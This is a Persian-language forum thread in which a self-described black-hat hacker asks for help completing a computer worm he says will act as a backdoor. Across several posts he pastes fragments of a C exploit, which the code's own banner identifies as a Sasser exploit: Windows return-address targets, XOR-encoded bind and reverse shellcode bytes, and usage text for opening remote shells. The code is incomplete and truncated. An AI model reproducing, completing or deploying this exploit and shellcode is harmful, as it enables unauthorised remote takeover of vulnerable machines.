پرش به


تصویر

کرم رایانه ای


 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
6 پاسخ برای این موضوع

#1 ارسالی 12 ژوئیه 2017 - 11:48

  OFFLINE
  تاریخ عضویت :
  12 ژوئیه 2017
 • %10█▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 12 ارسال
  Last Visit اكتبر 22 2017 10:59
 • Country :
 • Gender : Male
 • Location : !!تهران!!
 • Name : پارسا
با سلام.
من یه هکر کلاه سیاهم من میخوام بدونم که من که الان بخش war headیک کرم رایانه ای رو نوشتم باید چه کنم تا کامل شه ینی چه چیزی بهش اضافه کنم تا کامل بشه. وارهد رو در پست بعدی میزارم . ممنون از توجه تون.

ویرایش شده توسط parsaking 12 ژوئیه 2017 - 11:56 .


#2 ارسالی 12 ژوئیه 2017 - 11:58

  OFFLINE
  تاریخ عضویت :
  12 ژوئیه 2017
 • %10█▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 12 ارسال
  Last Visit اكتبر 22 2017 10:59
 • Country :
 • Gender : Male
 • Location : !!تهران!!
 • Name : پارسا
 

با سلام.
من یه هکر کلاه سیاهم من میخوام بدونم که من که الان بخش war headیک کرم رایانه ای رو نوشتم باید چه کنم تا کامل شه ینی چه چیزی بهش اضافه کنم تا کامل بشه. وارهد رو در پست بعدی میزارم . ممنون از توجه تون.

 

#3 ارسالی 12 ژوئیه 2017 - 12:05

  OFFLINE
  تاریخ عضویت :
  12 ژوئیه 2017
 • %10█▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 12 ارسال
  Last Visit اكتبر 22 2017 10:59
 • Country :
 • Gender : Male
 • Location : !!تهران!!
 • Name : پارسا
بفرمایید وارهد ورم پیوست شد

#4 ارسالی 12 ژوئیه 2017 - 12:10

  OFFLINE
  تاریخ عضویت :
  12 ژوئیه 2017
 • %10█▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 12 ارسال
  Last Visit اكتبر 22 2017 10:59
 • Country :
 • Gender : Male
 • Location : !!تهران!!
 • Name : پارسا
/*wORM SASER_+ FOR HACK ANY SITE (-_-) (: ( -_- ) _________ / ___// ____/ ____/ / ___/ __ \\__ \/ __/ / / / / / /_/ /__/ / /___/ /___ /_/ \____/____/_____/\____/ i'm parsa king the king of kings you can hack any site with this worm its"w______saser+" */ #include #include #include #include #include #define NORM "\033[00;00m" #define GREEN "\033[01;32m" #define YELL "\033[01;33m" #define RED "\033[01;31m" #define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.4 for " RED "sasser.x" NORM #define fatal(x) { perror(x); exit(1); } #define default_port 5554 struct { char *os; long goreg; long gpa; long lla;} targets[] = { // { "os", pop pop ret, GetProcAd ptr, LoadLib ptr }, { "wXP SP1 many", 0x77BEEB23, 0x77be10CC, 0x77be10D0 }, // msvcrt.dll's { "wXP SP1 most others", 0x77C1C0BD, 0x77C110CC, 0x77c110D0 }, { "w2k SP4 many", 0x7801D081, 0x780320cc, 0x780320d0 }, }, tsz;

#5 ارسالی 12 ژوئیه 2017 - 12:10

  OFFLINE
  تاریخ عضویت :
  12 ژوئیه 2017
 • %10█▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 12 ارسال
  Last Visit اكتبر 22 2017 10:59
 • Country :
 • Gender : Male
 • Location : !!تهران!!
 • Name : پارسا
unsigned char bsh[]={ 0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA, 0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E, 0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE, 0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE, 0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21, 0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36, 0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF, 0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8, 0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE, 0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22, 0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E, 0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D, 0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9, 0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA, 0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21, 0xC8,0x21,0x0E }; unsigned char rsh[]={ 0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA, 0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E, 0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE, 0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE, 0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21, 0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE, 0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89, 0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55, 0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3, 0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC, 0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE, 0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2, 0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E }; char verbose=0;

#6 ارسالی 12 ژوئیه 2017 - 12:11

  OFFLINE
  تاریخ عضویت :
  12 ژوئیه 2017
 • %10█▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 12 ارسال
  Last Visit اكتبر 22 2017 10:59
 • Country :
 • Gender : Male
 • Location : !!تهران!!
 • Name : پارسا
void setoff(long GPA, long LLA) { int gpa=GPA^0xdededede, lla=LLA^0xdededede; memcpy(bsh+0x1d,&gpa,4); memcpy(bsh+0x2e,&lla,4); memcpy(rsh+0x1d,&gpa,4); memcpy(rsh+0x2e,&lla,4); } void usage(char *argv0) { int i; printf("%s -d [opts]\n\n",argv0); printf("Options:\n"); printf(" -h undocumented\n"); printf(" -p to connect to [default: %u]\n",default_port); printf(" -s <'bind'/'rev'> shellcode type [default: bind]\n"); printf(" -P for the shellcode [default: 5300]\n"); printf(" -H for the reverse shellcode\n"); printf(" -L setup the listener for the reverse shell\n"); printf(" -t [default 0]; choose below\n\n"); printf("Types:\n");

#7 ارسالی 12 ژوئیه 2017 - 12:22

  OFFLINE
  تاریخ عضویت :
  12 ژوئیه 2017
 • %10█▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 12 ارسال
  Last Visit اكتبر 22 2017 10:59
 • Country :
 • Gender : Male
 • Location : !!تهران!!
 • Name : پارسا
دوستان من دیگه بقیشو نمیفرستم . لطفا اگه درباره ورم چیزی میدونید این یه بخش وار هد من کل وارهد رو دارم میشه بگید بقیشو من بنویسم؟ این ورم قراره به صورت یک بکدور عمل کنه . ممنون از جوابتون
0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP